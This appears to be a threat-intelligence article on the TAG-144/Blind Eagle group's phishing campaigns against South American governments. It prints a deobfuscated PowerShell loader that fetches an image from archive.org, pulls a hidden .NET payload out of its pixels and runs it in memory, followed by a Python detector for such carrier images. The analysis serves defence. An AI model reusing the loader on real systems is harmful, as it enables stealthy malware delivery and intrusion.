Over the past year, a clandestine cyber threat group identified as TAG-144—also known by aliases Blind Eagle and APT-C-36—has escalated its operations targeting government institutions across South America. First detected in 2018, this group has refined its methods, employing a variety of remote access trojans (RATs) such as AsyncRAT, REMCOS RAT, and XWorm. These malicious tools are predominantly disseminated through meticulously crafted spear-phishing campaigns that impersonate official judicial or tax communications.
In mid-2025, cybersecurity analysts from Recorded Future observed a significant surge in TAG-144’s activities. The group orchestrated five distinct operational clusters, each deploying new infrastructure and exploiting legitimate internet services to deliver malware payloads. Their initial access strategy often involves the use of compromised or spoofed email accounts from local government agencies. Unsuspecting recipients are enticed to open malicious documents or SVG attachments, which contain embedded JavaScript. When executed, this script retrieves a secondary loader from platforms like Paste.ee or Discord’s Content Delivery Network (CDN).
Recorded Future’s research uncovered numerous compromised email addresses belonging to Colombian government officials. These accounts were utilized to dispatch deceptive legal summonses, showcasing TAG-144’s adeptness at merging social engineering tactics with technical subterfuge. The repercussions of these campaigns have been particularly severe for Colombia’s federal and municipal agencies. The unauthorized extraction of credentials and sensitive data poses significant risks, including espionage and potential financial extortion.
While TAG-144’s operational clusters share core tactics—such as the use of dynamic DNS domains, open-source RATs, and stolen crypters—the group’s evolving techniques, including steganography and domain generation algorithms (DGAs), signify a shift towards more resilient and elusive operations. This evolution not only complicates traditional defense mechanisms but also blurs the lines between conventional cybercrime and state-sponsored espionage.
Infection Mechanism and Steganographic Payload Extraction
One of TAG-144’s more sophisticated methods involves embedding a Base64-encoded .NET assembly within the pixel data of an innocuous JPEG image hosted on Archive.org. Upon execution of the initial PowerShell script, the loader scans for a predefined byte marker within the image. It then extracts and invokes the payload directly in memory, effectively bypassing disk writes and evading detection by antivirus software.
For instance, the deobfuscated PowerShell segment responsible for this process operates as follows:
```powershell
$tormodont = 'https://archive.org/download/universe-…/universe.jpg'
$sclere = New-Object System.Net.WebClient
$sclere.Headers.Add('User-Agent','Mozilla/5.0')
$sorority = $sclere.DownloadData($tormodont)
# Identify marker and extract embedded bytes ($markerIndex is set by earlier lines omitted from this excerpt)
$splenoncus = $sorority[$markerIndex..($sorority.Length - 1)]
$stream = New-Object IO.MemoryStream
$stream.Write($splenoncus, 0, $splenoncus.Length)
$bitmap = [Drawing.Bitmap]::FromStream($stream)
# Reconstruct payload from pixel data: the R, G and B values of each pixel are appended in row order
foreach ($y in 0..($bitmap.Height-1)) {
    foreach ($x in 0..($bitmap.Width-1)) {
        $color = $bitmap.GetPixel($x,$y)
        $bytesList.Add($color.R); $bytesList.Add($color.G); $bytesList.Add($color.B)
    }
}
# The first four values form a length header; the next $length values are the Base64 text of the assembly
$payloadBytes = [Convert]::FromBase64String($bytesList[4..($length+3)] -join '')
# Load the decoded .NET assembly straight from memory and run its entry point; nothing is written to disk
[Reflection.Assembly]::Load($payloadBytes).EntryPoint.Invoke($null,$args)
```
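As an added defender's example (not code from the report or from the loader above), the Python below replays the reconstruction step on a decoded image's flat R,G,B byte stream, the form Pillow's `Image.convert("RGB").tobytes()` returns, and flags the image when the carved bytes form a PE image. The 4-byte little-endian length prefix is an assumption inferred from the script, the marker-carving step is skipped, and the sample inputs are constructed.

```python
import base64
import binascii
from typing import Optional


def reconstruct_payload(rgb: bytes) -> Optional[bytes]:
    """Replay the loader's reconstruction on a flat R,G,B byte stream.

    Layout is an assumption inferred from the script: the first four pixel
    bytes carry the Base64 text length, the Base64 characters follow.
    """
    if len(rgb) < 4:
        return None
    length = int.from_bytes(rgb[:4], "little")  # assumed little-endian header
    if length <= 0 or 4 + length > len(rgb):
        return None
    try:
        return base64.b64decode(rgb[4:4 + length], validate=True)
    except (binascii.Error, ValueError):
        return None


def is_pe_image(data: bytes) -> bool:
    """True if data starts with an MZ header whose e_lfanew points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def scan_pixels(rgb: bytes) -> dict:
    """Verdict for one decoded image; 'payload' holds the carved bytes, if any."""
    payload = reconstruct_payload(rgb)
    return {"embedded_pe": payload is not None and is_pe_image(payload),
            "payload": payload}


# ---- constructed sample inputs (not real malware) ----
def _fake_pe() -> bytes:
    # Minimal MZ stub: e_lfanew = 0x40, then a PE signature and filler bytes.
    header = b"MZ" + b"\x00" * 58 + (0x40).to_bytes(4, "little")
    return header + b"PE\x00\x00" + b"\x00" * 60


def build_carrier(payload: bytes, noise: bytes = b"\x7f" * 300) -> bytes:
    """Lay a payload out the way the loader expects, then pad with pixel noise."""
    b64 = base64.b64encode(payload)
    return len(b64).to_bytes(4, "little") + b64 + noise


if __name__ == "__main__":
    print(scan_pixels(build_carrier(_fake_pe()))["embedded_pe"])  # True
    print(scan_pixels(b"\x10\x20\x30" * 200)["embedded_pe"])      # False
```

Run the scanner over the pixel stream of any image an inbound script downloads or decodes; a hit means the picture is a carrier, regardless of how benign the JPEG looks on screen.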
This in-memory injection technique, combined with dynamic domain resolution—often utilizing services like duckdns.org and noip.com—ensures that the RAT’s command-and-control infrastructure remains agile and challenging to trace. By avoiding traditional executable downloads and employing steganography, TAG-144 demonstrates an advanced understanding of detection evasion and asset staging. This poses a persistent and evolving threat to government networks throughout the region.